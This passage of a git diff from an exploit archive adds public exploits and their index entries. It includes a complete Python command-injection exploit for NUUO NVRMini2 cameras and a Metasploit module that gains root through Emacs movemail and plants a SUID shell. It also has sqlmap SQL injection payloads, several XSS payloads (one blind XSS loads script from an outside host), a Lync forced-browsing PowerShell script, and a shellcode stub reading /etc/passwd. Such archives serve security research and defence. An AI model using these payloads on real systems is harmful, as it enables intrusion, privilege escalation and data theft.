keystrokestyped VARCHAR(255), machinetime VARCHAR(255) NOT NULL, ipaddress VARCHAR(255) NOT NULL, date TIMESTAMP)";
if ($conn->query($sqlk) === TRUE) {
$sqlinsertk ="INSERT INTO Keystrokes (id, machinename, windowtitle, keystrokestyped, machinetime, ipaddress, date) VALUES (NULL, '$machinename', '$windowtitle', '$keystrokestyped', '$machinetime', '$ipaddress', '$date')";
if ($conn->query($sqlinsertk) === TRUE) {
echo "<br>Success";
}else{
echo "<br>Error:" . $conn->error;
} } else {
echo "<br>Error:" . $conn->error;
}
################################
PoC:
http://127.0.0.1/post.php?type=keystrokes&machinename=[SQLi]1&machinetime=[SQLi]
################################
Response:
GET parameter 'machinename' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 410 HTTP(s) requests:
---
Parameter: machinename (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: type=keystrokes&machinename=1' RLIKE (SELECT (CASE WHEN (6432=6432) THEN 1 ELSE 0x28 END)) AND 'CbAF'='CbAF&machinetime=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: type=keystrokes&machinename=1' AND (SELECT 9909 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(9909=9909,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwid'='gwid&machinetime=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=keystrokes&machinename=1' AND SLEEP(5) AND 'MWry'='MWry&machinetime=1

20
exploits/php/webapps/45945.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Dolibarr ERP/CRM <= 8.0.3 - Cross-Site Scripting
# CVE: CVE-2018-19799
# Date: 2018-11-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://dolibarr.org
# Software Link: http://sourceforge.net/projects/dolibarr/files/
# Version: v8.0.3
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business.
# (customers, invoices, orders, products, stocks, agenda, e-mailings, shipments...)
# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials,
# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
# Dolibarr 8.0.3 is vulnerable; prior versions may also be affected.
# ==================================================================
# PoC:
# GET Request : /exports/export.php?step=2&datatoexport=[XSS PAYLOAD]&action=selectfield&field=pj.ref&page_y=627

15
exploits/php/webapps/45946.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19750
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/82)
# After logging into the Domainmod application panel, browse to the /admin/domain-fields page, Click Add custom field, and inject a javascript XSS payload in Display Name, Description & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/82

15
exploits/php/webapps/45947.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19751
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/83)
# After logging into the Domainmod application panel, browse to the /admin/ssl-fields/add.php page and inject a javascript XSS payload in Display Name, Description & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/83

110
exploits/php/webapps/45948.py Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: NUUO NVRMini2 Authenticated Command Injection
# Date: December 3, 2018
# Exploit Author: Artem Metla
# Vendor Homepage: https://www.nuuo.com/ProductNode.php?node=2#
# Version: 3.9.1
# Tested on: NUUO NVRMini2 with firmware 3.9.1
# CVE : CVE-2018-15716
# Advisory: https://www.tenable.com/security/research/tra-2018-41
import argparse
import requests
import urllib.parse
import binascii
import http.cookiejar as cookielib
import re
def run(target, username, password, command):
""" Authenticate us and execute exploitation """
# Step 1. Authentication
payload = {'language':'en', 'user':username, 'pass':password,
'submit':'Login'}
r = requests.post(urllib.parse.urljoin(target, 'login.php'),
data=payload, verify=False, allow_redirects=False)
jar = r.cookies
# Step 2. Prepare a payload
# We're bypassing 2 filters:
# 1) Instead of using ";" we can try || or &&, to bypass:
# if(strpos($uploaddir, ';') !== false)
# {
# die('[1]Not a valid path.');
# }
# 2) To bypass this:
# $cmd = "sed -i 's/".str_replace('/', '\/',
$current_dir)."/".str_replace('/', '\/', $tmp_upload_dir)."/g'
".PHP_CINF_PATH;
# we have to HEX encode a payload
#
# Simple example of payload that we're trying to achieve: '||ls`echo
-e "\\x20\\x2f"`||' to execue: ls /
# 3) Multiple parameters commands are not supported yet, but the same
techique could be used for them
# Primitive Bash command parser
splitted_command = [command]
for i in range(0, len(command)-1):
if command[i] == " " and command[i+1] != "-":
splitted_command = [command[:i], command[i+1:]]
break
# Encoding a payload
if len(splitted_command) == 2:
payload = "".join('\\\\x%s' %
binascii.hexlify(char.encode('ascii')).decode("utf-8") for char in
splitted_command[1])
exploit = '\'||%s `echo -e "%s"`||\'' % (splitted_command[0],
payload)
print("Exploit: %s" % exploit)
else:
exploit = '\'||%s||\'' % (splitted_command[0])
print("Exploit: %s" % exploit)
# Step 3. Send a payload
payload = {'cmd':'writeuploaddir', 'uploaddir':exploit}
r = requests.get(urllib.parse.urljoin(target, 'upgrade_handle.php'),
params=payload, verify=False, cookies=jar)
# Step 4. Output processing to grab only needed output
res = re.search('upload_tmp_dir=([^<>]*)<br />', str(r.content))
if res:
print(res.group(1).replace('\\n', '\n'))
def main():
""" Parse command line arguments and start exploit """
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="Examples: %(prog)s -t http://192.168.0.1/ -u username
-p password -c whoami")
# Adds arguments to help menu
parser.add_argument("-h", action="help", help="Print this help message
then exit")
parser.add_argument("-t", dest="target", required="yes", help="Target
URL address like: https://localhost:443/")
parser.add_argument("-u", dest="username", required="yes",
help="Username to authenticate")
parser.add_argument("-p", dest="password", required="yes",
help="Password to authenticate")
parser.add_argument("-c", dest="command", required="yes", help="Shell
command to execute")
# Assigns the arguments to various variables
args = parser.parse_args()
run(args.target, args.username, args.password, args.command)
#
# Main
#
if __name__ == "__main__":
main()

15
exploits/php/webapps/45949.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19752
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the /assets/add/registrar-account.php page and inject a javascript XSS payload in registrar Name, registrar url & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/84

68
exploits/php/webapps/45954.txt Normal file
View file

@ -0,0 +1,68 @@
Multiple Cross-Site Scripting Vulnerabilities in FreshRSS 1.11.1
Information
--------------------
Advisory by Netsparker
Name: Multiple Cross-Site Scripting Vulnerabilities in FreshRSS
Affected Software: FreshRSS
Affected Versions: 1.11.1
Homepage: https://freshrss.org/
Vulnerability: Cross-site Scripting
Severity: Medium
Status: Fixed
CVE-ID : CVE-2018-19782
CVSS Score (3.0): 6.3
Netsparker Advisory Reference: NS-18-024
Technical Details
--------------------
Blind Cross-site Scripting
URL : http://ns.app:8085/i/?c=auth&a='"--></style></scRipt><scRipt src="//4cipl0hyi5btaxbj3ovzc7b6e6eckgescau78dxgsho.r87.me"></scRipt> Parameter Name : a
Parameter Type : GET
Attack Pattern : %27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt+src%3d%22%2f%2f4cipl0hyi5btaxbj3ovzc7b6e6eckgescau78dxgsho%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e
Stored Cross-site Scripting
URL : http://ns.app:8085/i/?c=error
Injection URL : http://ns.app:8085/i/?c=error
Parameter Name : a
Parameter Type : GET
Attack Pattern : '"--></style></scRipt><scRipt>netsparker(0x00139F)</scRipt>
Cross-site Scripting
URL : http://ns.app:8085/i/?c=error
Proof URL : http://ns.app:8085/i/?c=error
Injection URL : http://ns.app:8085/i/?c=%3ciMg%20src%3dN%20onerror%3dnetsparker(0x001DCF)%3e&a=actualize&id=-1
Parameter Name : c
Parameter Type : GET
Attack Pattern : %3ciMg+src%3dN+onerror%3dnetsparker(0x001DCF)%3e
URL : http://ns.app:8085/i/?c=error
Proof URL : http://ns.app:8085/i/?c=error
Injection URL : http://ns.app:8085/i/?a=%3ciMg%20src%3dN%20onerror%3dnetsparker(0x001F6B)%3e&get=s&order=ASC
Parameter Name : a
Parameter Type : GET
Attack Pattern : %3ciMg+src%3dN+onerror%3dnetsparker(0x001F6B)%3e
For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).
Advisory Timeline
--------------------
12th November 2018- First Contact
28th November 2018 - Vendor Fixed
3rd December 2018 - Advisory Released
Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.
About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

163
exploits/unix/local/45953.rb Executable file
View file

@ -0,0 +1,163 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'Emacs movemail Privilege Escalation',
'Description' => %q{
This module exploits a SUID installation of the Emacs movemail utility
to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
},
'Author' => [
'Markus Hess', # Discovery? atrun(8) exploit for sure
'Cliff Stoll', # The Cuckoo's Egg hacker tracker
'wvu' # Module and additional research
],
'References' => [
%w[URL https://en.wikipedia.org/wiki/Movemail],
%w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
%w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
%w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
%w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
%w[URL https://mailutils.org/manual/html_node/movemail.html]
],
'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w[shell],
'Privileged' => true,
'Payload' => {'BadChars' => "\n", 'Encoder' => 'generic/none'},
'Targets' => [['/usr/lib/crontab.local', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic',
'CMD' => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
}
))
register_options([
OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
])
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
end
def bin_path
'/bin:/usr/bin:/usr/ucb:/etc'
end
def movemail
datastore['MOVEMAIL']
end
def crontab_local
'/usr/lib/crontab.local'
end
def crontab(cmd)
"* * * * * root #{cmd}\n* * * * * root rm -f #{crontab_local}"
end
# uname(1) does not exist, technique from /etc/rc.local
def is_43bsd?
cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')
end
# id(1) does not exist
def is_root?
cmd_exec('whoami').include?('root')
end
# test -u does not exist
def setuid_root?(path)
cmd_exec("find #{path} -user root -perm -4000 -print").include?(path)
end
def setup
super
vprint_status("Setting a sane $PATH: #{bin_path}")
case cmd_exec('echo $SHELL')
when %r{/bin/sh}
vprint_status('Current shell is /bin/sh')
cmd_exec("PATH=#{bin_path}; export PATH")
when %r{/bin/csh}
vprint_status('Current shell is /bin/csh')
cmd_exec("setenv PATH #{bin_path}")
else
vprint_bad('Current shell is unknown')
end
vprint_status("$PATH is #{cmd_exec('echo $PATH').chomp}")
end
def check
unless is_43bsd?
vprint_warning('System does not appear to be 4.3BSD')
end
unless file?(movemail)
vprint_bad("#{movemail} not found")
return CheckCode::Safe
end
unless movemail.end_with?('movemail')
vprint_warning("#{movemail} has an unexpected name")
end
unless setuid_root?(movemail)
vprint_status("Non-SUID-root #{movemail} found")
return CheckCode::Detected
end
vprint_good("SUID-root #{movemail} found")
CheckCode::Appears
end
def exploit
if is_root?
print_good('Session is already root, executing payload directly')
return cmd_exec(payload.encoded)
end
unless check == CheckCode::Appears || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
# outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);
if file?(crontab_local)
fail_with(Failure::NoTarget, "#{crontab_local} already exists")
end
print_status('Preparing crontab with payload')
tab = crontab(payload.encoded)
vprint_line(tab)
# umask (umask (0) & 0333);
# (void) ftruncate (indesc, 0L);
print_status("Creating writable #{crontab_local}")
cmd_exec("(umask 0 && #{movemail} /dev/null #{crontab_local})")
unless writable?(crontab_local)
fail_with(Failure::NoAccess, "#{crontab_local} is not writable")
end
print_good("Writing crontab to #{crontab_local}")
cmd_exec("echo '#{tab.gsub("'", "'\\\\''")}' > #{crontab_local}")
print_warning('Please wait at least one minute for effect')
end
end

91
exploits/windows/dos/45936.ps1 Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download
# Author: @nyxgeek - TrustedSec
# Date: 2018-03-20
# Vendor Homepage: microsoft.com
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517
# CVE: CVE-2018-8474
# Version: Lync:Mac 2011 14.4.3, likely earlier versions
# Tested on: Lync:Mac 2011 14.4.3 (170308)
# Description:
# Force browsing or download via embedded iframe in a chat window. No user
# interaction required. When the iframe contains a web site URL, a new browser
# window of the default browser will open with the URL.
# If the URL is a file, it will download it automatically if it is a permitted
# file type (e.g., zip)
# A write-up can be found at:
# https://www.trustedsec.com/2018/09/full-disclosure-microsoft-lync-for-mac-2011-susceptible-to-forced-browsing-download-attack/
# Requirements: Originating machine needs Lync 2013 SDK installed
# (https://www.microsoft.com/en-us/download/details.aspx?id=36824)
# Timeline of Disclosure:
#
# 07/18/2017 - Reported issue to Microsoft
# 11/22/2017 - Microsoft has reproduced problem
# 03/07/2018 - Microsoft replies that they have decided not to fix, but gave
# their blessing for disclosure
#target user
$target = "user@domain"
$message = "<iframe src='https://www.youtube.com/watch?v=9Rnr70wCQSA'></iframe>"
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
try
{
# you may need to change the location of this DLL
Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
}
catch
{
Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
}
}
# Connect to the local Skype process
try
{
$client = [Microsoft.Lync.Model.LyncClient]::GetClient()
}
catch
{
Write-Host "`nYou need to have Skype open and signed in first"
break
}
#Start Conversation
$msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
#Add the Message
$msg.Add(1,$message)
# Add the contact URI
try
{
$contact = $client.ContactManager.GetContactByUri($target)
}
catch
{
Write-Host "`nFailed to lookup Contact"$target
break
}
# Create a conversation
$convo = $client.ConversationManager.AddConversation()
$convo.AddParticipant($contact) | Out-Null
# Set the message mode as IM
$imModality = $convo.Modalities[1]
# Send the message
$imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
# End the Convo to suppress the UI
$convo.End() | Out-Null
Write-Host "Sent the following message to "$target":`n"$message

154
exploits/windows/remote/45952.rb Executable file
View file

File diff suppressed because one or more lines are too long

17
files_exploits.csv
View file

@ -6204,6 +6204,9 @@ id,file,description,date,author,type,platform,port
45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows, 45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows,
45931,exploits/windows/dos/45931.txt,"Mozilla Firefox 63.0.1 - Denial of Service (PoC)",2018-12-03,"SAIKUMAR CHEBROLU",dos,windows, 45931,exploits/windows/dos/45931.txt,"Mozilla Firefox 63.0.1 - Denial of Service (PoC)",2018-12-03,"SAIKUMAR CHEBROLU",dos,windows,
45934,exploits/linux/dos/45934.txt,"Budabot 4.0 - Denial of Service (PoC)",2018-12-03,"Ryan Delaney",dos,linux, 45934,exploits/linux/dos/45934.txt,"Budabot 4.0 - Denial of Service (PoC)",2018-12-03,"Ryan Delaney",dos,linux,
45936,exploits/windows/dos/45936.ps1,"Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download",2018-12-04,nyxgeek,dos,windows,
45950,exploits/multiple/dos/45950.txt,"Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption",2018-12-04,"Google Security Research",dos,multiple,
45951,exploits/multiple/dos/45951.txt,"Wireshark - 'find_signature' Heap Out-of-Bounds Read",2018-12-04,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10132,6 +10135,8 @@ id,file,description,date,author,type,platform,port
45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos, 45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos,
45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows, 45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows,
45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd, 45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd,
45938,exploits/aix/local/45938.pl,"Xorg X11 Server (AIX) - Local Privilege Escalation",2018-12-04,0xdono,local,aix,
45953,exploits/unix/local/45953.rb,"Emacs - movemail Privilege Escalation (Metasploit)",2018-12-04,Metasploit,local,unix,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16987,6 +16992,8 @@ id,file,description,date,author,type,platform,port
45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple, 45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple,
45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066 45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066
45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858 45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40436,3 +40443,13 @@ id,file,description,date,author,type,platform,port
45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80 45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux, 45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80 45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
45944,exploits/php/webapps/45944.txt,"KeyBase Botnet 1.5 - SQL Injection",2018-12-04,n4pst3r,webapps,php,
45945,exploits/php/webapps/45945.txt,"Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting",2018-12-04,AkkuS,webapps,php,80
45946,exploits/php/webapps/45946.txt,"DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45947,exploits/php/webapps/45947.txt,"DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45948,exploits/php/webapps/45948.py,"NUUO NVRMini2 3.9.1 - Authenticated Command Injection",2018-12-04,"Artem Metla",webapps,php,443
45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -923,3 +923,5 @@ id,file,description,date,author,type,platform
45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64

1 id file description date author type platform
923 45669 shellcodes/linux_x86/45669.c Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes 2018-10-24 Goutham Madhwaraj shellcode linux_x86
924 45743 shellcodes/windows_x86-64/45743.c Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator) 2018-10-30 Roziul Hasan Khan Shifat shellcode windows_x86-64
925 45821 shellcodes/linux_x86/45821.c Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes) 2018-11-13 Javier Tello shellcode linux_x86
926 45940 shellcodes/linux/45940.nasm Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) 2018-12-04 Nelis shellcode linux
927 45943 shellcodes/linux_x86-64/45943.c Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) 2018-12-04 Kağan Çapar shellcode linux_x86-64

46
shellcodes/linux/45940.nasm Normal file
View file

@ -0,0 +1,46 @@
; Exploit Title: /usr/bin/head -n99 cat etc/passwd (poly shellcode-571.php)
; Date: November 29th, 2018
; Exploit Author: Nelis
; Version: 0.2
; Tested on: Ubuntu 12.10
; Filename: headpass.nasm
; SLAE-ID: 1327
; Based on: http://shell-storm.org/shellcode/files/shellcode-571.php
; Shellcode:"\x29\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe6\x50\x68\x2d\x6e\x39\x39\x89\xe7\x50\x68\x68\x65\x61\x64\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x68\x2f\x75\x73\x72\x89\xe3\x50\x57\x56\x53\xb0\x0b\x89\xe1\xcd\x80"
global _start
section .text
_start:
sub eax, eax ; changed from xor eax, eax
push eax ; put 0-term on stack
push dword 0x64777373 ; dwss
push dword 0x61702f63 ; ap/c
push dword 0x74652f2f ; te//
mov esi, esp ; save addr of stack into esi
push eax
push dword 0x39396e2d ; 99n-
mov edi, esp ; save addr of stack into edi
push eax
push dword 0x64616568 ; daeh
push dword 0x2f6e6962 ; /nib
push dword 0x2f2f2f2f ; ////
push dword 0x7273752f ; rsu/ changed from cat to head command
mov ebx,esp ; unchanged (save addr of stack into into ebx)
